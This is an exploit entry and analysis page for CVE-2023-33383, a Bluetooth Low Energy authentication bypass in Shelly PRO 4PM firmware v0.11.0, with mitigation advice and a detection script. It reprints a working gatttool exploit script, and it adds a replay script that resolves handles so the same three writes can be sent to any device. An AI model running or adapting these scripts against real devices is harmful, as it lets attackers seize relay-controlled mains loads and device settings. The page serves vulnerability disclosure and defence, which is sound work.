Shelly PRO 4PM v0.11.0 - Authentication Bypass

Exploit Author: The Security Team [exploitsecurity.io] Analysis Author: www.bubbleslearn.ir Category: Remote Language: Shell Published Date: 2023-08-04
#!/bin/bash

# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
# Google Dork: NA
# Date: 2nd August 2023
# Exploit Author: The Security Team [exploitsecurity.io]
# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
# Vendor Homepage: https://www.shelly.com/
# Software Link: NA
# Version: Firmware v0.11.0 (REQUIRED)
# Tested on: MacOS/Linux
# CVE : CVE-2023-33383

# BLE address of the target. As published, the author's test unit's address was
# hardcoded in every gatttool call; it can be overridden as the first argument.
TARGET="${1:-c8:f0:9e:88:92:3e}"
RED="\e[31m"
GREEN="\e[92m"
WHITE="\e[97m"
ENDCOLOR="\e[0m"


banner()
    {
        clear
        echo -e "${GREEN}[+]*********************************************************[+]"
        echo -e "${GREEN}|   Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}]              |"
        echo -e "${GREEN}|   Description: Shelly PRO 4PM - Out of Bounds              |"
        echo -e "${GREEN}|   CVE: CVE-2023-33383                                      |"
        echo -e "${GREEN}[+]*********************************************************[+]"
        echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
    }

# ATT Write Request of <hex bytes> to <handle>. gatttool exits non-zero when the
# write is rejected or no connection can be made, so callers test its status
# directly. As published, the script tested $? right after "sleep 1", i.e. it
# checked sleep's exit status and never gatttool's; the "$failed=$true" lines
# were also invalid assignments and have been dropped.
ble_write()
    {
        sudo gatttool -b "$TARGET" --char-write-req -a "$1" -n "$2" >/dev/null 2>&1
    }

banner
read -s -n 1 key
if [ "$key" = "x" ]; then
    exit 0;
elif [ "$key" = "" ]; then
    # Reachability check: list primary services, giving up after 5 seconds.
    gattout=$(sudo timeout 5 gatttool -b "$TARGET" --primary)
    if [ -z "$gattout" ]; then
        echo -e "${RED}Connection timed out${ENDCOLOR}"
        exit 1;
    fi
    # Step 1: 4-byte write 00 00 00 01 to handle 0x000d.
    if ! ble_write 0x000d 00000001; then
        echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
        exit 1;
    fi
    echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
    sleep 1
    # Step 2: 1-byte write 0xab to handle 0x0008.
    if ! ble_write 0x0008 ab; then
        echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
        exit 1;
    fi
    sleep 1
    # Step 3: 2-byte write 0xab 0xcd to the same handle. As published, the
    # result of this write was never checked.
    ble_write 0x0008 abcd
    sleep 1
    for i in {1..5}
    do
        echo -ne "${GREEN}."
        sleep 1
    done
    # As published, printed unconditionally after the third write: the script
    # does not read anything back or otherwise check the device's state, so
    # the bypass has to be confirmed out of band.
    echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
fi


CVE-2023-33383: Authentication Bypass in Shelly PRO 4PM v0.11.0 via Out-of-Bounds Read Vulnerability

On August 2nd, 2023, The Security Team at exploitsecurity.io published an exploit for a vulnerability in the Shelly PRO 4PM, a four-channel DIN-rail relay with power metering, affecting firmware v0.11.0. Tracked as CVE-2023-33383, the flaw lets an attacker within Bluetooth Low Energy (BLE) radio range bypass authentication by triggering an out-of-bounds read in the device's BLE handling, without holding any credentials.

Understanding the Vulnerability

The root cause, according to the exploit author's write-up linked in the script header, is missing boundary validation in the firmware's handling of BLE writes. Shelly Gen2 devices such as the PRO 4PM expose a GATT (Generic Attribute Profile) service over BLE for local configuration, and, as the script shows, a GATT client can write to that service's characteristics without pairing or bonding.

The exploit's write sequence delivers payloads to characteristic handle 0x0008 whose lengths the firmware does not validate against what it expects, and the resulting out-of-bounds read is what the write-up identifies as the path to the authentication bypass. The page does not document which memory is read or what the device does afterwards; statements about leaked authentication tokens or session identifiers are not supported by the script, which only performs the writes.

The attack needs no credentials, no pairing and no user interaction, but it is a BLE attack: the attacker must be within radio range of the device with a BLE-capable adapter (the script uses gatttool, BlueZ's GATT client). Exploit-DB's "Remote" category only means the attack is not run on the device itself; it does not mean the device is reachable for this purpose over an IP network, and exposure to "untrusted networks" is not what makes a unit vulnerable. Radio range is what matters.

Exploit Mechanics: A Step-by-Step Breakdown

The exploit script published by The Security Team (exploitsecurity.io), reproduced at the top of this page, drives the attack with gatttool, BlueZ's command-line GATT client. The steps it performs are explained below:

Explanation: The script sets up colour codes and a banner, then waits for a single keypress: x exits, Enter starts the sequence.

Step 1: sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary connects to the target and lists its primary services; if nothing comes back within 5 seconds the script reports a timeout and exits. The address c8:f0:9e:88:92:3e is the BLE address of the author's test unit, not a constant for the product: every device has its own, and it must be replaced with the target's (for example from a bluetoothctl scan) before the script can do anything.

Step 2: A Write Request puts the 4 bytes 00 00 00 01 into handle 0x000d. The page does not identify this characteristic. Shelly Gen2 firmware is built on Mongoose OS, whose BLE RPC service expects exactly a 4-byte big-endian frame length on its rx_ctl characteristic before frame data arrives, so the most plausible reading, an inference rather than something the page states, is that this write announces a 1-byte RPC frame. Whether 0x000d is that characteristic on a given unit can be checked with gatttool --characteristics.

Step 3: A single byte, 0xab, is written to handle 0x0008. As published, the script tests $? right after sleep 1, so it is checking sleep's exit status rather than gatttool's; any real check has to capture gatttool's status directly.

Step 4: Two bytes, 0xab 0xcd, are written to the same handle. If the inference in step 2 is right, the device has now received three bytes of a frame announced as one byte long. The loop of five dots is a five-second delay, not feedback from the device.

The script then prints [Pwned!] unconditionally; it performs no read or state check that would confirm the bypass. Treat that line as "all writes were sent", and confirm success out of band, for instance by checking whether the device's authenticated interface now answers without credentials.
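As an added example (not part of the Exploit-DB entry or of exploitsecurity.io's code), the following bash script resolves the two handles from characteristic UUIDs instead of hardcoding 0x0008 and 0x000d, and replays the same three writes with each gatttool exit status checked. The UUIDs are the Mongoose OS BLE RPC "data" and "rx_ctl" characteristics and the sample gatttool output is constructed; that the Shelly's 0x0008/0x000d correspond to those characteristics is an assumption, not something this page confirms.

```bash
#!/bin/bash
# Added example; not part of the Exploit-DB entry or of exploitsecurity.io's code.
# Handle numbers like 0x0008 and 0x000d are positions in one unit's GATT table,
# so resolve them from characteristic UUIDs before replaying the sequence
# against another device, and check every gatttool exit status.
#
# ASSUMPTION: the UUIDs below are the Mongoose OS BLE RPC "data" and "rx_ctl"
# characteristics and Shelly Gen2 firmware exposes them; the page does not
# confirm that 0x0008/0x000d are those characteristics. Verify on your unit.
set -u

RPC_DATA_UUID="5f6d4f53-5f52-5043-5f64-6174615f5f5f"    # assumed: "_mOS_RPC_data___"
RPC_RX_CTL_UUID="5f6d4f53-5f52-5043-5f72-785f63746c5f"  # assumed: "_mOS_RPC_rx_ctl_"

# value_handle_for_uuid <uuid>  (reads `gatttool -b <addr> --characteristics`
# output on stdin). Prints the characteristic's value handle; returns 1 if the
# UUID is not listed.
value_handle_for_uuid() {
    local uuid="$1" handle
    handle=$(awk -v u="$uuid" '
        # one line per characteristic, e.g.
        # handle = 0x0007, char properties = 0x0c, char value handle = 0x0008, uuid = 5f6d...
        index($0, "uuid = " u) > 0 {
            for (i = 1; i <= NF; i++)
                if ($i == "value" && $(i + 1) == "handle" && $(i + 2) == "=") {
                    h = $(i + 3); sub(/,$/, "", h); print h; exit
                }
        }')
    [ -n "$handle" ] || return 1
    printf '%s\n' "$handle"
}

# send_sequence <addr> <data-handle> <ctl-handle>
# Replays the page's three writes. Returns the number of the first write that
# gatttool rejected (1..3), 0 when all three were accepted. It deliberately
# prints no "Pwned!": accepted writes alone do not prove the bypass took effect.
send_sequence() {
    local addr="$1" data_h="$2" ctl_h="$3"
    sudo gatttool -b "$addr" --char-write-req -a "$ctl_h"  -n 00000001 >/dev/null 2>&1 || return 1
    sleep 1
    sudo gatttool -b "$addr" --char-write-req -a "$data_h" -n ab       >/dev/null 2>&1 || return 2
    sleep 1
    sudo gatttool -b "$addr" --char-write-req -a "$data_h" -n abcd     >/dev/null 2>&1 || return 3
}

# Constructed sample of `gatttool --characteristics` output, written so the
# handles match the page's script; a real unit's table may differ.
SAMPLE_CHARS='handle = 0x0002, char properties = 0x02, char value handle = 0x0003, uuid = 00002a00-0000-1000-8000-00805f9b34fb
handle = 0x0007, char properties = 0x0c, char value handle = 0x0008, uuid = 5f6d4f53-5f52-5043-5f64-6174615f5f5f
handle = 0x0009, char properties = 0x02, char value handle = 0x000a, uuid = 5f6d4f53-5f52-5043-5f74-785f63746c5f
handle = 0x000c, char properties = 0x08, char value handle = 0x000d, uuid = 5f6d4f53-5f52-5043-5f72-785f63746c5f'

main() {
    local addr="$1" chars data_h ctl_h
    chars=$(sudo timeout 5 gatttool -b "$addr" --characteristics) || { echo "no connection to $addr" >&2; return 1; }
    data_h=$(printf '%s\n' "$chars" | value_handle_for_uuid "$RPC_DATA_UUID") || { echo "data characteristic not found" >&2; return 1; }
    ctl_h=$(printf '%s\n' "$chars" | value_handle_for_uuid "$RPC_RX_CTL_UUID") || { echo "rx_ctl characteristic not found" >&2; return 1; }
    echo "data handle $data_h, rx_ctl handle $ctl_h"
    send_sequence "$addr" "$data_h" "$ctl_h"
}

# Dry run of the parser against the sample; the script only talks to a device
# when a BLE address is given as argument 1.
printf '%s\n' "$SAMPLE_CHARS" | value_handle_for_uuid "$RPC_DATA_UUID"   # 0x0008
if [ -n "${1:-}" ]; then
    main "$1"
fi
```

The return code of send_sequence tells you which write the device refused, which is more useful than the original's silent exit; a device that is not running v0.11.0 or does not expose the expected characteristics fails at discovery rather than at an arbitrary write.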

Security Implications and Risk Assessment

Severity: This analysis rates CVE-2023-33383 High: no credentials, pairing or user interaction are needed, and the device switches mains-powered loads.

Attack Surface: The entry point is BLE, which assessments focused on the Wi-Fi/HTTP interface often leave out. BLE does require radio proximity, but that is tens of metres and through walls, and the radio is used for initial provisioning and typically stays enabled afterwards, so a unit in a building's distribution board can be reached from a corridor or car park.

Impact: The script stops after the three writes, so the page does not show what an attacker does with the bypass. Assuming it yields what an authenticated local user has, that is:

  • switching the four relay outputs, i.e. the connected loads, on or off
  • changing device configuration, including credentials, network settings and schedules
  • reading the power-metering data
  • triggering a firmware update, an action normally reserved for authenticated users

Such capabilities can lead to:

  • denial of service to whatever the relays power, and tampering with measured consumption
  • persistent control after the BLE session is over, via changed credentials or configuration
  • disclosure of occupancy and usage patterns from the metering data

Vendor Response and Mitigation

Shelly fixed the issue in later firmware; this analysis cites v0.11.1 as the first fixed release, and the exploit's own header states that v0.11.0 is required, so a unit reporting any other version is outside the exploit's scope. The fix is described here as added input validation and boundary checks on GATT writes; the page includes neither the patch nor a vendor advisory, so treat that description as unverified.

Recommendations:

  • Update all Shelly PRO 4PM units past v0.11.0 (v0.11.1 or later per this analysis) and confirm the running version from the device's web UI or its Shelly.GetDeviceInfo RPC.
  • Disable BLE once a device is provisioned, wherever it is not needed: Gen2 firmware has a BLE enable setting (the BLE.SetConfig RPC, also exposed in the web UI), and a radio that is off cannot be reached by this exploit.
  • Segment IoT devices from critical systems; this does not stop a BLE attack, but it limits what a compromised relay can reach over the network.
  • Monitor BLE: bluetoothctl is a controller management shell, not a traffic monitor. Use btmon (BlueZ's HCI monitor) to watch a host's own adapter, or a dedicated BLE sniffer feeding Wireshark to observe writes from unknown peers to devices you do not control.
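Added example for the monitoring recommendation (not from the page or the vendor): a check over a btmon-style capture that flags an announced frame length smaller than the bytes subsequently delivered to the data handle, which is what the page's three-write sequence looks like under the Mongoose OS RPC framing assumption (4-byte length on a control handle, then frame bytes on a data handle). The capture lines are constructed in the style of btmon output, the handle numbers are parameters, and the framing assumption must be verified on the target.

```bash
#!/bin/bash
# Added example; not from the page or the vendor. Checks a btmon-style capture
# for the write pattern of the exploit: a frame length announced on the control
# handle that is smaller than the bytes then delivered to the data handle.
#
# ASSUMPTIONS: (1) the control handle takes a 4-byte big-endian frame length
# and the data handle the frame bytes (Mongoose OS BLE RPC framing); the page
# does not confirm this for the Shelly, so both handles are parameters.
# (2) The capture lines below are constructed in the style of btmon output; on
# a host you control, btmon shows that host's own adapter traffic, while other
# devices' BLE traffic needs a dedicated sniffer.

# check_frames <capture-file> <ctl-handle> <data-handle>
# Prints one line per announced frame whose delivered byte count exceeds the
# announced length. Returns 1 if any such frame was found, else 0.
check_frames() {
    awk -v ctl="$2" -v data="$3" '
        function hex2int(h,    i, v) {
            v = 0; h = tolower(h)
            for (i = 1; i <= length(h); i++)
                v = v * 16 + index("0123456789abcdef", substr(h, i, 1)) - 1
            return v
        }
        function flush() {
            if (open && delivered > announced) {
                print "frame " n ": announced=" announced " delivered=" delivered
                bad++
            }
        }
        /ATT: Write Request/ { inwrite = 1; handle = ""; next }
        inwrite && /Handle: 0x/ { for (i = 1; i <= NF; i++) if ($i == "Handle:") handle = $(i + 1); next }
        inwrite && /Data:/ {
            hex = $2
            if (handle == ctl) {              # new frame: its length is announced
                flush()
                n++; announced = hex2int(hex); delivered = 0; open = 1
            } else if (handle == data && open) {
                delivered += length(hex) / 2  # bytes delivered for the open frame
            }
            inwrite = 0
        }
        END { flush(); exit (bad > 0 ? 1 : 0) }
    ' "$1"
}

# Constructed capture: the page's sequence (4-byte length 1 to the control
# handle, then 1 + 2 bytes to the data handle) against a unit at 0x000d/0x0008.
EXPLOIT_LOG=$(mktemp)
cat >"$EXPLOIT_LOG" <<'EOF'
> ACL Data RX: Handle 64 flags 0x02 dlen 11
      ATT: Write Request (0x12) len 6
        Handle: 0x000d
          Data: 00000001
< ACL Data TX: Handle 64 flags 0x00 dlen 5
      ATT: Write Response (0x13) len 0
> ACL Data RX: Handle 64 flags 0x02 dlen 8
      ATT: Write Request (0x12) len 3
        Handle: 0x0008
          Data: ab
> ACL Data RX: Handle 64 flags 0x02 dlen 9
      ATT: Write Request (0x12) len 4
        Handle: 0x0008
          Data: abcd
EOF

# Constructed capture of a well-formed 2-byte frame for comparison.
BENIGN_LOG=$(mktemp)
cat >"$BENIGN_LOG" <<'EOF'
> ACL Data RX: Handle 64 flags 0x02 dlen 11
      ATT: Write Request (0x12) len 6
        Handle: 0x000d
          Data: 00000002
> ACL Data RX: Handle 64 flags 0x02 dlen 9
      ATT: Write Request (0x12) len 4
        Handle: 0x0008
          Data: abcd
EOF

check_frames "$EXPLOIT_LOG" 0x000d 0x0008   # frame 1: announced=1 delivered=3
check_frames "$BENIGN_LOG"  0x000d 0x0008   # no output, exit 0
```

The check is deliberately per-frame rather than per-write: a single short write to the data handle is normal RPC traffic, and it is only the mismatch against the announced length that distinguishes the exploit's sequence from a legitimate client.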

Expert Insights: Why This Vulnerability Matters

From a cybersecurity perspective, CVE-2023-33383 exemplifies a growing trend: IoT devices with minimal security controls are becoming prime targets for exploitation. The Shelly PRO 4PM is a DIN-rail device meant for professional installation in distribution boards, yet its firmware failed to validate the length of data arriving over BLE before using it.

As device manufacturers prioritize feature delivery over security auditing, vulnerabilities like this emerge. This exploit underscores the need for:

  • Regular firmware audits
  • Static and dynamic analysis of BLE protocols
  • Penetration testing of IoT devices in real-world environments

Furthermore, the use of gatttool as an attack tool highlights the accessibility of such exploits — even non-experts with basic Linux knowledge can execute them. This democratization of cyberattacks is a significant concern for enterprise and home users alike.

Conclusion

CVE-2023-33383 serves as a stark reminder that even seemingly secure devices can harbor critical flaws. The authentication bypass in Shelly PRO 4PM v0.11